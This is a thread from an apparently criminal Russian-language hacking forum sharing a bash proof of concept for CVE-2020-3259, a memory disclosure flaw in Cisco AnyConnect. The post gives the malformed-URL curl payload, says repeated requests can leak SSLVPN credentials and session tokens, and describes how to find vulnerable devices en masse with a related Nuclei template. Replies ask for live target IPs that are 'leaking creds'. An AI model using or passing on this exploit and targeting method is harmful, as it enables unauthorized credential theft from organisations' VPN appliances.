• XSS.stack #1 – первый литературный журнал от юзеров форума

Web [CVE-2020-3259] Cisco AnyConnect Web Services Information Disclosure Vulnerability

mkhalilovx29

ripper
КИДАЛА
Регистрация
02.02.2024
Сообщения
45
Реакции
33
Гарант сделки
4
Пожалуйста, обратите внимание, что пользователь заблокирован
Hey Community!

Didn't see any posts about this PoC, so I figured I'd share since it's still kicking around in 2024: Link

POC: POC Link

Cisco-CVE-2020-3259.sh
Bash:
ARGSTR='+CSCOE+/sdesktop/webstart.xml?tokeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeen=!@#$%^&%^&%^&%^&%^&%^&%^&%^%^&%^&%^&%^&%^%^&%^&%^&%^&test=%p'
echo $ARGSTR
curl -k https://1.2.3.4/$ARGSTR --trace-ascii output.txt

This bad boy's a Heartbleed-style vuln. Every time you fire off a request, you can snag a chunk of memory.


Do it enough times (with a bit of luck) and boom – you've got Cisco SSLVPN creds or login sessions.


Can't find any Nuclei or Nmap templates to scan for this thing, but here's a tip: check out the changelog for the fix. The versions are pretty close to the ones that patched CVE-2020-3580 (not exactly, but close enough).


So, you can hunt for vulnerable devices using the CVE-2020-3580 Nuclei template: Template
 
Последнее редактирование модератором:
кто нибудь тестил эту тему выдает что нибудь? если у кого выдает скиньте пж айпишку с которого креды сыпит или еще чего, посмотреть какой вывод, спасибо заранее!
 
Пожалуйста, обратите внимание, что пользователь заблокирован
Has anyone tested this theme and does it show anything? If anyone gives it out, please send off the IP address from which it is pouring out credits or something else, see what the output is, thanks in advance!
Test on this target you can have see the response in hex mode


Скрытый контент для пользователей: .

Recommended to using Postman instead of Curl , as the payload have escape chars
 
кто нибудь тестил эту тему выдает что нибудь? если у кого выдает скиньте пж айпишку с которого креды сыпит или еще чего, посмотреть какой вывод, спасибо заранее!
И мне пожлста, хочу понять где смотреть. СПС.
 


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх